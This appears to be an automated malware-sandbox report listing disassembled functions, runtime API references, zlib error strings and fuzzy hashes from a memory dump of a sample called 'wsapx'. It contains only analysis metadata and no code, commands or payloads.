Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: a06605fad0fb532140a1d7121615bf9b8aa18f496d392976e0b8397aaceec27c
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 7B114F36B14B058BEB00DF60F8452A973A4FB59B68F440E35DA5D46764DF3CD1598350

Function 00007FF7C71D3C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7C71D3CE6
memcpy_s.LIBCPMT ref: 00007FF7C71D3D11

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: e222d40b259723b39d1bf00d4e7d0eb24b594311e539cb882107c992f7882744
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: BDC1C472B1868687DB259F1AB0846AAF791F7A4B94F848134DF5A43784DF3DE802CB40

Function 00007FF7C71BA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

header crc mismatch, xrefs: 00007FF7C71BA991
, xrefs: 00007FF7C71BA5CB
unknown header flags set, xrefs: 00007FF7C71BA535

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: 25c89feb67a86c9517ebedacbe162c3504520921d5aec83e3a0c24758c5ff20a
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: B3F192A2A083D58BE7A5AF14D488B3EBAE9FF84B50F454538DE4947790CF38E542C750

Function 00007FF7C71D9798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7C71D99E7
RaiseException.KERNEL32 ref: 00007FF7C71D99F8

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: 6de5ceb8ad0f2a55dc06da292ca5ca6751057fc281e8a240fc3e6fdcb74a8865
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 8AB17E73A04B898BEB16DF29D48636C7BA0F784F58F548921DA9D837A4CF39D452CB10

Function 00007FF7C71C3A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7C71C3B82
, xrefs: 00007FF7C71C3DC4

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: b754e0ddf44741f320038ad6d158f5993fdccc199f4383ded995a8952d68c073
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: D9E1C432A0868683EB68AEA5E05017DB3A0FF85F68F944135DE4E076D4DF29E953C712

Function 00007FF7C71BA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF7C71BA4B2
incorrect header check, xrefs: 00007FF7C71BA4CB

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: a30454f43580e9ebd33200ab56684a5bb6f2a276cafcce3056c792ed3446b0cf
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: EE919AB2A182C587E7A59F14E488B3E7AD9FB84760F554139DE4A467D0CF3CE542CB10

Function 00007FF7C71CDF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF7C71CE0EA
e+000, xrefs: 00007FF7C71CE06D

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: 6c2f31555495d389edc27585796280867d82c8fc7e0056771376426543c39500
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 41517662B186C187E7259E75A801769AB95F7C4FA4F988231CBA847AC5CF3DE04AC710

Function 00007FF7C71CDACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7C71CDE0E

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: af848be1ad5894f7509a17744cbedf42c132c9c72f8c71b4c65052b67861edec
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 3DA16562A287D547EB25DF69B0017B9BB90ABA0FA4F448032DE8D47785DE3DE502C311

Function 00007FF7C71C8804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF7C71C8823

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
Instruction ID: f4bcde2e80cf04e101c6f7a71eaebb69c123bc9c43f56d41b04b55a111b594ba
Opcode Fuzzy Hash: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
Instruction Fuzzy Hash: 55519C11B0864243FB65BEA77A9217AD2916FD5FE4FC84134DE0E47B96EE3CE4038221

Function 00007FF7C71D34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7C71D34F4

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 758ffed34e6138c2c25caf028f6af6984ca46bc6a62f3e309a7a73d35564d374
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 9FB09220E07A82C3EA0A3F217CC221862A57F98B20FD80138C10D40330EE3C21E65B20

Function 00007FF7C71C3610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: b0a9f5a6fc818377867f10aa1793b43e8c4be1b22c2a5c6e2d347271659eb883
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 0BD1FA62A086C243EB68AE65A14127DB7A0FB85F68F950235CE0D077D4CF3DD843C762

Function 00007FF7C71B9870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 4993fc7ece0f69f6ee79de49a4d691399c6f90a6599f013fd050574a82c27b08
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 18C1AD762181E08BD28AEA29E47947A77E0F78930DBD5406BEF8747685CA3CA415DB20

Function 00007FF7C71C2C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: 8cf246ce7ccc8ac08b8049cb71a15c70054e4f13a4d62fc080e80120e3b928d3
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: 49B1BD32A0878587E764DF69E05027CBBA4F789F68FA48135CA4E57399CF39D442C760

Function 00007FF7C71CE5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: 39eecddadff3d123b607d730f20df7b02873bd3b157102f35cec40bd1a004a09
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: 6D811272A1878187EB74DF59B54237ABA95FBC5BE4FA04235DA8D03B84CE3CE4058B10

Function 00007FF7C71D6488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction ID: 81acf1a7a5e1a02d9523a07ab2cb8fb17e1ca5e70a27678668166aa19e97d0f8
Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction Fuzzy Hash: 27611F22F0C19247F726AD6CA48427DE6A0AFE0FF0F944239D61D466C5DE7DE8428F20

Function 00007FF7C71C1DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 0b7b1ad3cd954ab2c0618d886b9cb2ffe34868b624c2e7c00da9a5458c93d66a
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 8551A5B6A5865287E7259F69E040278B3A0EB89FB8F644231CE4C57794CF3AEC43D750

Function 00007FF7C71C21D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 59bd4b6246f1c3c1521a9166d8ce1a7f8cd465e535a887ca4a0938654e6deb65
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 73516E76A1865187E7649F69E044238B7A0EBD9F78F649231CE8D07798CF3AE843C750

Function 00007FF7C71C19B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 46a31758cd5ca094a4563c8ce4cad88f0c42f41b3487ef795a781b5a5c059c58
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: E45186B6A5865183E7249F69E04032873B0EB84FB8FA84131CA4D57794DF7AE943D750

Function 00007FF7C71C1FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 974c62040fbfb089980a1be5d8d2f2388fa8137f4cfc4f0186dbf8c7194a5b20
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 09518F76A1865187F7249F69E440229B7A0EB84F68FA4C132CE4D177A8CF3AEC53C750

Function 00007FF7C71C17B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 7f8661e85dbff17d43d96779a1dc1347a7cf6f02485d0d5c0519daf58b1f2d9b
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: B051B1B6A5865187E7249F68E14123CA3A1EB84FB8F645031CE4D17794CF3AE853D760

Function 00007FF7C71C1BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: ed950f88d3a0be6ef986e6ee661154cbd19345900948b38d02f8a1be1ce7c47c
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: C851D4B2A6865187E7249F69E044378B3A1EB84FB8FA44131DE4C07798CF3AE843D754

Function 00007FF7C71C5DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

